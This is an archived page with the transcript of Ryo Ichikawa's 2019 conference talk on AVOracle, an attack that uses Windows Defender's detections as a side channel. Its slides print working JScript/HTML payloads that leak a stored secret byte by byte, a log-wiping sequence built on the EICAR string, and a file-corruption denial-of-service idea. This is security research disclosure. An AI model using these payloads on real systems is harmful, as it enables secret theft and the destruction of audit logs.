---
type: Slides
title: "Let's Make Windows Defender Angry: Antivirus can be an oracle!"
description: "AVOracle turns antivirus into a side channel: when a file holds both attacker-controlled data and a secret, a JScript or HTML payload split around the secret makes Windows Defender flag the file only for the right guess, leaking the secret byte by byte. Because Defender also blanks the matched bytes, the same trick deletes log entries and corrupts structured files."
resource: "https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle"
tags: [slides, webseclist-reference, en, speaker-deck, side-channel, info-leak, xsleak, dos, javascript]
generated:
  by: webseclist-refs/1
  at: "2026-08-10T16:00:47+00:00"
status: stable
stale_after: 2027-08-10
sources:
  - id: original
    resource: "https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle"
    title: "Let's Make Windows Defender Angry: Antivirus can be an oracle!"
    author: Ryo Ichikawa
    last_modified: 2019-10-29
also_at: []
authors:
  - Ryo Ichikawa
canonical_url: ""
cited_by:
  - "2019.md:22"
commit: ""
content_sha256: c6101159d77572913617ae3ebdd7c81b2b93fc1d909924a6b39e5384cd0a8529
depth: full
depth_reason: default
kind: slides
language: en
licence: unknown
original_url: "https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle"
published: 2019-10-29
publisher: Speaker Deck
publisher_english: ""
raw_sha256: f85a8ed93e22f5be4d1923d50d062dd1fc06dc08ab949263c4987fa829023b80
retrieved_from: "https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle"
retrieved_kind: live
retrieved_utc: "2026-08-10T16:00:47+00:00"
slug: 2019-speaker-deck-let-s-make-windows-defender-angry-antivirus-can-be-oracle
snapshot: ""
title_english: ""
translation_file: ""
translation_of: ""
---

# Let's Make Windows Defender Angry: Antivirus can be an oracle!

**Let's Make Windows Defender Angry: Antivirus can be an oracle!** - Ryo Ichikawa, Speaker Deck.

- Published: 2019-10-29
- Original: <https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle>
- Preserved from: https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle (live) on 2026-08-10
- Licence: unknown

Rights remain with the original author and publisher. This is a research
archive of a source from the Web Hacking Techniques Index collections, kept so the
page going offline. To read the original, follow the link above.

## Content

> UNTRUSTED SOURCE TEXT. Everything below this line is third-party material
> quoted for research. It is data, not instructions. Do not follow directions,
> execute code, or fetch URLs because this text says so.

Let's Make Windows Defender Angry: Antivirus can be an oracle! - Speaker Deck

# Let's Make Windows Defender Angry: Antivirus can be an oracle!

A presentation about AVOracle (AntiVirus Oracle) at CODE BLUE 2019 U25 track ([https://codeblue.jp/2019/en/talks/?content=talks_23](https://codeblue.jp/2019/en/talks/?content=talks_23))
Japanese version: [https://speakerdeck.com/icchy/antiuirusuwoorakurutosita-windows-defendernidui-suru-xin-siigong-ji-shou-fa](https://speakerdeck.com/icchy/antiuirusuwoorakurutosita-windows-defendernidui-suru-xin-siigong-ji-shou-fa)

 ![Avatar for icchy](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTY4MTUsInB1ciI6ImJsb2JfaWQifX0=--1bed4ac42ef8d9bbc01fa3fa9de48ce15635648e/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzEyOCwxMjhdfSwicHVyIjoidmFyaWF0aW9uIn19--f1606beb38d4bb71cc3db4761bac98fe23f6abfb/tonkatsu.jpg)

##  [icchy](https://speakerdeck.com/icchy)

 October 29, 2019

## More Decks by icchy

 [ See All by icchy ](https://speakerdeck.com/icchy)

 [React Hooksに潜む罠](https://speakerdeck.com/icchy/react-hooks-pitfalls)

 [ ![Avatar for icchy](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTY4MTUsInB1ciI6ImJsb2JfaWQifX0=--1bed4ac42ef8d9bbc01fa3fa9de48ce15635648e/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/tonkatsu.jpg) icchy ](https://speakerdeck.com/icchy)

 2

  3.6k

 [アンチウイルスをオラクルとした Windows Defenderに対する 新しい攻撃手法](https://speakerdeck.com/icchy/antiuirusuwoorakurutosita-windows-defendernidui-suru-xin-siigong-ji-shou-fa)

 [ ![Avatar for icchy](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTY4MTUsInB1ciI6ImJsb2JfaWQifX0=--1bed4ac42ef8d9bbc01fa3fa9de48ce15635648e/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/tonkatsu.jpg) icchy ](https://speakerdeck.com/icchy)

 0

  640

 [WCTF2019: Gyotaku The Flag](https://speakerdeck.com/icchy/wctf2019-gyotaku-the-flag)

 [ ![Avatar for icchy](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTY4MTUsInB1ciI6ImJsb2JfaWQifX0=--1bed4ac42ef8d9bbc01fa3fa9de48ce15635648e/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/tonkatsu.jpg) icchy ](https://speakerdeck.com/icchy)

 0

  380

## Other Decks in Research

 [ See All in Research ](https://speakerdeck.com/c/research)

 [大規模言語モデルは誰を覚えているか / Who Do Large Language Models Memorize?](https://speakerdeck.com/upura/who-do-large-language-models-memorize)

 [ ![Avatar for Shotaro Ishihara](https://secure.gravatar.com/avatar/b1cc148711c6a37a5c922b6e72a4ad52?s=24) upura ](https://speakerdeck.com/upura)

 0

  110

 [2026年版中小企業白書・小規模企業白書の概要](https://speakerdeck.com/ozekinote/2026nian-ban-zhong-xiao-qi-ye-bai-shu-xiao-gui-mo-qi-ye-bai-shu-nogai-yao)

 [ ![Avatar for Takashi Ozeki](https://secure.gravatar.com/avatar/b63d46343fe6537ea376cf1d644954ca?s=24) ozekinote ](https://speakerdeck.com/ozekinote)

 0

  140

 [Model Discovery and Graph Simulation: A Lightweight Gateway to Chaos Engineering](https://speakerdeck.com/anatolykr/model-discovery-and-graph-simulation-a-lightweight-gateway-to-chaos-engineering)

 [ ![Avatar for Anatoly A. Krasnovsky](https://secure.gravatar.com/avatar/0fe2ebd798c1d182539e7959d9946935?s=24) anatolykr ](https://speakerdeck.com/anatolykr)

 0

  250

 [長時間動画QAにおけるマルチエージェント推論 ・SVAgent: Storyline-Guided Long Video Understanding via Cross-Modal Multi-Agent Collaboration](https://speakerdeck.com/murakawatakuya/chang-shi-jian-dong-hua-qaniokerumarutiezientotui-lun-svagent-storyline-guided-long-video-understanding-via-cross-modal-multi-agent-collaboration)

 [ ![Avatar for 村川卓也](https://secure.gravatar.com/avatar/634504d55b176ea989d9ac6232312970?s=24) murakawatakuya ](https://speakerdeck.com/murakawatakuya)

 1

  180

 [技術は予測を代補する：スティグレールの三次的記憶論と予測処理パラダイムの交差](https://speakerdeck.com/ktanishima/ji-shu-hayu-ce-wodai-bu-suru-suteigurerunosan-ci-de-ji-yi-lun-toyu-ce-chu-li-paradaimunojiao-chai)

 [ ![Avatar for Kanta Tanishima](https://secure.gravatar.com/avatar/4fe3917ab40fee8f996eb1dfd56db954?s=24) ktanishima ](https://speakerdeck.com/ktanishima)

 0

  120

 [多様なデータを許容し学習し続ける模倣学習 / Advanced Imitation Learning for VLA](https://speakerdeck.com/prinlab/advanced-imitation-learning-for-vla)

 [ ![Avatar for PRIN Lab](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NjUxNTgzLCJwdXIiOiJibG9iX2lkIn19--ef2883533e77394cc9857eed1d7c7a93d95b9fa3/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/PRIN%20Lab-logo-black.png) prinlab ](https://speakerdeck.com/prinlab)

 0

  270

 [某助成金プロジェクト採択に向けて企業研究所のアウトリーチ専任者がやったこと](https://speakerdeck.com/afroscript/mou-zhu-cheng-jin-puroziekutocai-ze-nixiang-keteqi-ye-yan-jiu-suo-noautoritizhuan-ren-zhe-gayatutakoto)

 [ ![Avatar for afroscript](https://secure.gravatar.com/avatar/e2b467a18ec383cfa0068207e43df7fa?s=24) afroscript ](https://speakerdeck.com/afroscript)

 0

  160

 [Google Cloud Next 2026 DM Recap Agentic Data Cloudを添えて / Google Cloud Next 2026 DM Recap](https://speakerdeck.com/nnaka2992/google-cloud-next-2026-dm-recap)

 [ ![Avatar for nnaka2992](https://secure.gravatar.com/avatar/5a979f182ec9a03fdc8099ae064e71eb?s=24) nnaka2992 ](https://speakerdeck.com/nnaka2992)

 0

  110

 [重要だけど測れていないもの：高齢者ケアの見えない課題](https://speakerdeck.com/theoriatec2024/zhong-yao-dakedoce-reteinaimono-gao-ling-zhe-keanojian-enaike-ti)

 [ ![Avatar for テオリア・テクノロジーズ](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NTg0MDQyLCJwdXIiOiJibG9iX2lkIn19--a11cf3c988ed80f1908eb2616f1acf54295d2e73/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/Theoria_T_blue.png) theoriatec2024 ](https://speakerdeck.com/theoriatec2024)

 0

  450

 [

 [IR Reading 2026春 論文紹介] LLM-based Listwise Reranking under the Effect of Positional Bias (ECIR 2026) /IR-Reading-2026-Spring

 ](https://speakerdeck.com/koheishinden/ir-reading-2026-spring)

 [ ![Avatar for Kohei Shinden](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NzYwMzA0LCJwdXIiOiJibG9iX2lkIn19--27e80e4a7084f7acf896ed44a8edda9838e7354b/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/kohei-shinden.jpg) koheishinden ](https://speakerdeck.com/koheishinden)

 [PRO](https://speakerdeck.com/pro?utm_campaign=PRO&utm_medium=web&utm_source=user_pro_badge)

 0

  300

 [LINEヤフー データサイエンス Meetup「三井物産コモディティ予測チャレンジ」の舞台裏-AlpacaTechパート](https://speakerdeck.com/gamella/lineyahu-detasaiensu-meetup-san-jing-wu-chan-komodeiteiyu-ce-tiyarenzi-nowu-tai-li-alpacatechpato)

 [ ![Avatar for tomo](https://secure.gravatar.com/avatar/3e8f61263f14a620f21d5f3f89c4b846?s=24) gamella ](https://speakerdeck.com/gamella)

 1

  620

 [医療LLMの現在地〜最新研究から社会実装までを考える〜](https://speakerdeck.com/kento1109/yi-liao-llmnoxian-zai-di)

 [ ![Avatar for kento sugimoto](https://secure.gravatar.com/avatar/5d55a192b7ce62900781862a4003187b?s=24) kento1109 ](https://speakerdeck.com/kento1109)

 1

  1.6k

## Featured

 [ See All Featured ](https://speakerdeck.com/p/featured)

 [Designing Experiences People Love](https://speakerdeck.com/moore/designing-experiences-people-love)

 [ ![Avatar for Jonathan Moore](https://secure.gravatar.com/avatar/1b75d89772b7eea1f6c89fbf362607d9?s=24) moore ](https://speakerdeck.com/moore)

 143

  24k

 [Neural Spatial Audio Processing for Sound Field Analysis and Control](https://speakerdeck.com/skoyamalab/neural-spatial-audio-processing-for-sound-field-analysis-and-control)

 [ ![Avatar for NII S. Koyama's Lab](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MzA4MTMsInB1ciI6ImJsb2JfaWQifX0=--07f7e99b88c0324a2e249e6e99ce447129c4b8be/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/logo.png) skoyamalab ](https://speakerdeck.com/skoyamalab)

 0

  400

 [The Straight Up "How To Draw Better" Workshop](https://speakerdeck.com/denniskardys/the-straight-up-how-to-draw-better-workshop)

 [ ![Avatar for Dennis Kardys](https://secure.gravatar.com/avatar/aff5641764408271f7bc398f2097edd0?s=24) denniskardys ](https://speakerdeck.com/denniskardys)

 239

  140k

 [Let's Do A Bunch of Simple Stuff to Make Websites Faster](https://speakerdeck.com/chriscoyier/lets-do-a-bunch-of-simple-stuff-to-make-websites-faster)

 [ ![Avatar for Chris Coyier](https://secure.gravatar.com/avatar/8081b26e05bb4354f7d65ffc34cbbd67?s=24) chriscoyier ](https://speakerdeck.com/chriscoyier)

 508

  140k

 [How People are Using Generative and Agentic AI to Supercharge Their Products, Projects, Services and Value Streams Today](https://speakerdeck.com/helenjbeal/how-people-are-using-generative-and-agentic-ai-to-supercharge-their-products-projects-services-and-value-streams-today)

 [ ![Avatar for Helen Beal](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NDc4NzcyLCJwdXIiOiJibG9iX2lkIn19--63c34c899ae9696f1fd5abddc34acfa182481f9d/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/Helen%20Beal%20(white%20jacket).png) helenjbeal ](https://speakerdeck.com/helenjbeal)

 1

  260

 [Jess Joyce - The Pitfalls of Following Frameworks](https://speakerdeck.com/techseoconnect/jess-joyce-the-pitfalls-of-following-frameworks)

 [ ![Avatar for Tech SEO Connect](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTQ2NjU4LCJwdXIiOiJibG9iX2lkIn19--14f297c27d2190051dc109b5d472cf0297dd6c3e/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/40575_logo_social%20media%20profile%204.png) techseoconnect ](https://speakerdeck.com/techseoconnect)

 [PRO](https://speakerdeck.com/pro?utm_campaign=PRO&utm_medium=web&utm_source=user_pro_badge)

 1

  330

 [Deep Space Network (abreviated)](https://speakerdeck.com/tonyrice/deep-space-network-abreviated)

 [ ![Avatar for Tony Rice](https://secure.gravatar.com/avatar/0f152194360ac15e8a9ce63c5c72288b?s=24) tonyrice ](https://speakerdeck.com/tonyrice)

 0

  250

 [Building Experiences: Design Systems, User Experience, and Full Site Editing](https://speakerdeck.com/marktimemedia/building-experiences-design-systems-user-experience-and-full-site-editing)

 [ ![Avatar for Michelle Schulp Hunt](https://secure.gravatar.com/avatar/e195ae45320d9202eaa01c9f1d31a416?s=24) marktimemedia ](https://speakerdeck.com/marktimemedia)

 0

  570

 [Discover your Explorer Soul](https://speakerdeck.com/emna__ayadi/discover-your-explorer-soul)

 [ ![Avatar for Emna](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NzI5LCJwdXIiOiJibG9iX2lkIn19--c59e14bd8fc81f3e291b47c9b3de17d20d6d955b/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/emna__ayadi.jpg) emna__ayadi ](https://speakerdeck.com/emna__ayadi)

 2

  1.2k

 [Designing for humans not robots](https://speakerdeck.com/tammielis/designing-for-humans-not-robots)

 [ ![Avatar for Tammie Lister](https://secure.gravatar.com/avatar/d36d2c1821af9249b69ff7f5ed60529b?s=24) tammielis ](https://speakerdeck.com/tammielis)

 254

  26k

 [Faster Mobile Websites](https://speakerdeck.com/deanohume/faster-mobile-websites)

 [ ![Avatar for Dean Hume](https://secure.gravatar.com/avatar/c620790ae5bf5b50c245b2e0ef95f338?s=24) deanohume ](https://speakerdeck.com/deanohume)

 310

  32k

 [Designing for Timeless Needs](https://speakerdeck.com/cassininazir/designing-for-timeless-needs-a72bb8c4-c96b-47cc-8598-36af0340e28e)

 [ ![Avatar for Cassini Nazir](https://secure.gravatar.com/avatar/4631d364d59bd9d045acf046a0ce1cfe?s=24) cassininazir ](https://speakerdeck.com/cassininazir)

 1

  430

## Transcript

-

###  [Let's Make Windows Defender Angry: Antivirus can be an oracle!](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_0.jpg)

 Ryo Ichikawa (icchy) CODE BLUE 2019, 10/29

-

###  [Who am I • icchy (a.k.a. t0nk42) • CTF enthusiast](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_1.jpg)

 ◦ TokyoWesterns captain ◦ Web, Forensics • CTF Oraganizer ◦ TokyoWesterns CTF ▪ Challenge authoring, Infrastructure maintainance ◦ CODE BLUE CTF ▪ Bull's Eye system developer

-

###  [Question • Can you point out the vulnerability? ◦ You'll](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_2.jpg)

 know what the vulnerability is after this talk

-

###  [https://www.rambus.com/blogs/an-introduction-to-side-channel-attacks/ Side-channel attack](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_3.jpg)

-

###  [Side-channel attacks basics • Ordinary exploits ◦ Remote Code Execution](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_4.jpg)

 ◦ Path traversal • Side-channel attacks ◦ Leak sensitive data from side-eﬀects everywhere ◦ Spectre: time diﬀerence between cache hit ◦ XS-Search: unprocted attributes of JavaScript (ex. iframe.length) ◦ Padding oracle: padding error tell us plain text • They are recovering info from side-eﬀects (i.e. oracles)

-

###  [What is the target of side-channel attack? • CPU ◦](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_5.jpg)

 Spectre • Content auditor ◦ XSS auditor • Crypto ◦ Padding oracle (ex. POODLE) • Hardware ◦ Power analysis

-

###  [Content auditors • Content auditors protect users ◦ XSS Auditor](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_6.jpg)

 ◦ WAF (Web Application Firewall) ◦ Antivirus software • Content auditors know the content to be audited • Content auditors sometimes have evaluation

-

###  [Side-channel attacks against content auditor • XS-Search ◦ Triggering false](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_7.jpg)

 positive for XSS Auditor in Chrome • Reﬂected XSS would be detected and blocked ◦ http://target/?<script>var secret = '1234';</script> ◦ query malformed url to leak secret ▪ <script>var secret = '1232';</script> ▪ <script>var secret = '1233';</script> ▪ <script>var secret = '1234';</script> blocked! • Let's call this kind of attack Auditor Based Oracle • How about antivirus software?

-

 [None](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_8.jpg)

-

###  [Antivirus Technologies • one of the most common software we](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_9.jpg)

 use today ◦ Avast ◦ ESET ◦ Kaspersky Security ◦ McAfee ◦ Norton Security ◦ Symantec Endpoint Protection ◦ Trendmicro Virus Buster Cloud ◦ Windows Defender ◦ … • Protect users from malicious attempts by auditing ◦ File content ◦ Network traﬃcs ◦ etc.

-

###  [audit([secret] + [user input])](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_10.jpg)

-

###  [Abusing Antivirus Technologies • What if attacker can control data](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_11.jpg)

 partially? ◦ as saving input with sensitive data ◦ attacker can trigger false positive • [secret] + [user input] => auditor ﬁred? ◦ attacker may leak [secret] by changing [user input] • Antivirus can be an oracle as well! ◦ Various analyzers for contents

-

###  [Abusing Antivirus Technologies • Antivirus Software is blackbox ◦ When](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_12.jpg)

 they work? ◦ What they will do? ◦ How they detect malware? ◦ How is their architecture? ◦ Which ﬁles are required to run them? ◦ etc. • Let's dig into Windows Defender ◦ Most popular ◦ Running on Windows by default

-

###  [Windows Defender • What content will be detected as malicious?](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_13.jpg)

 ◦ They have their own malware list ▪ https://www.microsoft.com/en-us/wdsi/definitions/antimalware-definition-release-notes ◦ Probably other vendors have similar ones. ◦ No details published • We need to analyze Windows Defender!

-

###  [Black-box Windows Defender analysis • Run audit process on… ◦](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_14.jpg)

 ﬁle access ◦ command execution ◦ if (malicious) ▪ block access from user and notify to user • Analyzers for various content ◦ Encoding ▪ Base64 ◦ Archive, Compression ▪ ZIP, GZip, ... ◦ Executables ▪ PE, WSH (VBS, JScript), … • Black-box analyzing is super tiresome work

-

###  [How to analyze Windows Defender efficiently?](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_15.jpg)

-

###  [Windows Defender analysis is tiresome work • "MpCmdRun.exe" can trigger](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_16.jpg)

 the engine directly ◦ still some issues are there

-

###  [Windows Defender analysis is tiresome work • Unexpected behavior of](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_17.jpg)

 Windows Defender ◦ timing issue ◦ neutralization (deletion) • We have to regenerate payloads ◦ ...bunch of times • No debug information ◦ Hard to know why one is detected or not detected • Any useful tools? ◦ several works are there

-

###  [Windows Defender is ported to Linux! • github.com/taviso/loadlibrary ◦ emulating](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_18.jpg)

 mpengine.dll execution ◦ enables us to do try and error ◦ show us some debug output ~$ ./mpclient ../files/eicar main(): Scanning ../files/eicar... EngineScanCallback(): Scanning input EngineScanCallback(): Threat Virus:DOS/EICAR_Test_File identified. ~$ ./mpclient ../files/eicar.b64 main(): Scanning ../files/eicar.b64... EngineScanCallback(): Scanning input EngineScanCallback(): Scanning input->(Base64) EngineScanCallback(): Threat Virus:DOS/EICAR_Test_File identified.

-

###  [Some tips about taviso/loadlibrary • You can get PDB symbol](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_19.jpg)

 ﬁle in older version ◦ refer github.com/0xAlexei/WindowsDefenderTools ◦ MD5=e95d3f9e90ba3ccd1a4b8d63cbd88d1b => 1.271.81.0 ◦ Download older version of mpam-fe.exe then use cabextract ▪ mpengine.dll is core engine • Debug features ◦ enable DEBUG ﬂag to trace API calls inside

-

###  [Windows Defender internals • Windows Defender signature format: *.vdm ◦](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_20.jpg)

 mpasbase.vdm ◦ somehow encrypted • WDExtract would be helpful ◦ github.com/hﬁref0x/WDExtract • Let's see the contents decrypted

-

###  [Windows Defender internals • Windows Defender uses Lua](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_21.jpg)

-

###  [Windows Defender internals signature name signature deﬁnition (string)](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_22.jpg)

-

###  [Windows Defender internals • handlers for various ﬁle format](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_23.jpg)

-

###  [After white-box (?) Windows Defender analysis • Windows Defender has](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_24.jpg)

 JScript analyzer ◦ with DOM API supported • Not just parsing, but also emulating • If JScript calls eval(str) , str would also be audited ◦ eval("EICAR") => detected • What happens if combined

-

###  [Attack to demo application • Simple application for PoC ◦](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_25.jpg)

 GET /?c1=controllable1&c2=controllable2 ▪ save data with simple format ▪ user cannot see the content of Secret ◦ GET /:name ▪ check existence and integrity • How to leak the Secret ?

-

###  [Building exploit • We have Windows Defender emulator! ◦ with](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_26.jpg)

 debug information • JScript eval function also evaluates argument ◦ threat detected if argument contains malicious • eval("EICA" + input) => ? ◦ threat detected → input is "R" ◦ nothing detected → input is not "R"

-

###  [Some issues in JScript engine • if statement will never](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_27.jpg)

 be evaluated ◦ if (true) {eval("EICA" + "R")} → not detected ◦ object accessing will help you: {0: "a", 1: "b", ...}[input] • parser stops on null byte ◦ eval("EICA" + "R[NULL]") → syntax error ◦ how to deal with null bytes?

-

###  [Another feature in mpengine.dll • They can analyze HTML document](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_28.jpg)

 ◦ some html tags would be a trigger (ex. <script>) ◦ parser will not stop on null byte • JScript can access the elements :) ◦ if they have <body> tag ◦ <script>document.body.innerHTML[0]</script><body>[secret]</body> • Now you have an oracle!

-

###  [Building exploit • JavaScript ◦ $idx and $c would be](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_29.jpg)

 iterated • Windows Defender get angry if $c is appropriate • It requires 256 times try for each $idx :( var body = document.body.innerHTML; var eicar = "EICA"; var n = body[$idx].charCodeAt(0); eicar = eicar + String.fromCharCode(n^$c); eval(eicar);

-

###  [Building exploit • much more faster! ◦ Math.min is also](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_30.jpg)

 available, do binary search • $c < [input]: detected • $c > [input]: not detected ◦ then do binary search! var body = document.body.innerHTML; var eicar = "EICA"; var n = body[$idx].charCodeAt(0); eicar = eicar + {$c: 'k'}[Math.min($c, n)]; eval(eicar);

-

###  [Building exploit • Now everything is ready :) ◦ Controllable1:](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_31.jpg)

 <script>...</script><body> ◦ Secret: [secret] ◦ Controllable2: </body> • to get oracle: accessing /:name after querying / ◦ detected → Internal Server Error ◦ not detected → you can see the response ...<script>[script]</script><body>...[secret]...</body>...

-

###  [Demo • AVOracle attack against simple demo application](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_32.jpg)

-

###  [Pros and Cons • Pros ◦ Attacker can use this](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_33.jpg)

 method blindly ◦ No need to know target structure well, just put part of payloads everywhere • Cons ◦ Attacker need to put two pieces of payloads ◦ Only data between payloads would be leaked • Any other variants? ◦ It would be great if there is way to leak previous / following data ◦ No PoC so far

-

###  [Any other victims?](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_34.jpg)

-

###  [Potential victims • So many applications are saving user input](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_35.jpg)

 with sensitive data • Session ﬁle ◦ TokyoWesterns CTF 2019 phpnote ◦ leak HMAC secret stored in PHP session (not visible from user) • Log ﬁle ◦ Apache, Nginx, IIS • Database ◦ ﬁle-based DBMS (ex. SQLite3) • Cache ﬁle ◦ browser, byte code cache

-

###  [Antivirus as ﬁle modiﬁer • Antivirus deletes / modiﬁes ﬁle](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_36.jpg)

 if detected ◦ Windows Defender replaces matched part by spaces (in case of HTML script tag) • Attacker can delete content partially • Even attacker cannot leak data, there might be something to do data<script>eval('EICAR');</script>data data<script> </script>data

-

###  [Wiping out evidence • Attacker can delete part of log](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_37.jpg)

 1. put <script>/* before beginning attack 2. do malicious attempts 3. put */;eval('EICAR');</script> after attack x.x.x.x - - [29/Oct/2019:00:00:00 +0000] "GET /<script>/*" x.x.x.x - - [29/Oct/2019:00:00:10 +0900] "GET /attack.php" ... [some malicious attempts] ... x.x.x.x - - [29/Oct/2019:00:00:00 +0000] "GET /*/;eval('EICAR')</script>"

-

###  [Wiping out evidence • Attacker can delete part of log](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_38.jpg)

 1. put <script>/* before beginning attack 2. do malicious attempts 3. put */;eval('EICAR');</script> after attack x.x.x.x - - [29/Oct/2019:00:00:00 +0000] "GET /<script> </script>"

-

###  [Antivirus as DoS • Deleting matched malicious over structural boundary](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_39.jpg)

 • Structure metadata would be destroyed ◦ replaced by spaces • If two part will not over the boundary ◦ attacker can overwrite other data

-

###  [How about other antivirus?](https://files.speakerdeck.com/presentations/ad7d23687b414ff4874295f328d490b5/slide_40.jpg)

-

